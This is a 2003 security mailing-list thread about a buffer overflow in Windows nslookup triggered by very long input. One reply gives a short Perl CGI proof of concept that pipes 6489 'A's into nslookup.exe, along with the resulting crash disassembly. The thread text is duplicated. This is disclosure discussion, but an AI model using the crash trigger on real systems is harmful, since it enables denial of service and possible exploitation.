,_____________________________________________________,
\ Ryan Yagatich support (at) pantek (dot) com [email concealed] / Pantek Incorporated (877) LINUX-FIX /
\ http://www.pantek.com/security (440) 519-1802 / Are your networks secure? Are you certain? /
\___A4536371BF88C57DB181799D00BCA331E6AD909D297C3493___
On Thu, 20 Mar 2003, Blue Boar wrote:
>Patrick Webster wrote:
>> Can you do anything interesting with this?:
>>
>> C:\>nslookup
>> Default Server: dns.server.net
>> Address: 111.222.333.444
>>
>>
>>>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
>>
>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA
>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA
>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>>
>> Gives error: memory can't be "read" - 0x414141 (aka A).
>
>If you have to manually type all the A's, then probably not. Maybe if
>someone did something silly like make a CGI script that calls nslookup.exe
>directly with user input.
>
>What OS are you testing on? It looks like it's fixed in XP:
>
>C:\winxp\system32>nslookup
>Default Server: dns1.snfcca.sbcglobal.net
>Address: 206.13.28.12
>
> >
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>*** Input is too long
> >
>
>
> BB
>
==begin silly.cgi
#!perl -w
use strict;
print "Content-type: text/html\n\n";
open(NSLOOKUP,"|nslookup.exe") || die "Could not open nslookup.exe (path?)";
print NSLOOKUP "A" x 6489;
close(NSLOOKUP);
==end silly.cgi
MSDE:
Unhandled exception at 0x01004d65 in NSLOOKUP.EXE: 0xC0000005: Access
violation writing location 0x0103e000.
01004D5D cmp esi,100F770h
01004D63 je 01004D6F
---> 01004D65 mov dword ptr [edi],esi
01004D67 add edi,4
01004D6A jmp 01004C37
01004D65 = 16797029
,_____________________________________________________,
\ Ryan Yagatich support (at) pantek (dot) com [email concealed] / Pantek Incorporated (877) LINUX-FIX /
\ http://www.pantek.com/security (440) 519-1802 / Are your networks secure? Are you certain? /
\___A4536371BF88C57DB181799D00BCA331E6AD909D297C3493___
On Thu, 20 Mar 2003, Blue Boar wrote:
>Patrick Webster wrote:
>> Can you do anything interesting with this?:
>>
>> C:\>nslookup
>> Default Server: dns.server.net
>> Address: 111.222.333.444
>>
>>
>>>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
>>
>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA
>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA
>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>>
>> Gives error: memory can't be "read" - 0x414141 (aka A).
>
>If you have to manually type all the A's, then probably not. Maybe if
>someone did something silly like make a CGI script that calls nslookup.exe
>directly with user input.
>
>What OS are you testing on? It looks like it's fixed in XP:
>
>C:\winxp\system32>nslookup
>Default Server: dns1.snfcca.sbcglobal.net
>Address: 206.13.28.12
>
> >
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>*** Input is too long
> >
>
>
> BB
>
[ reply ]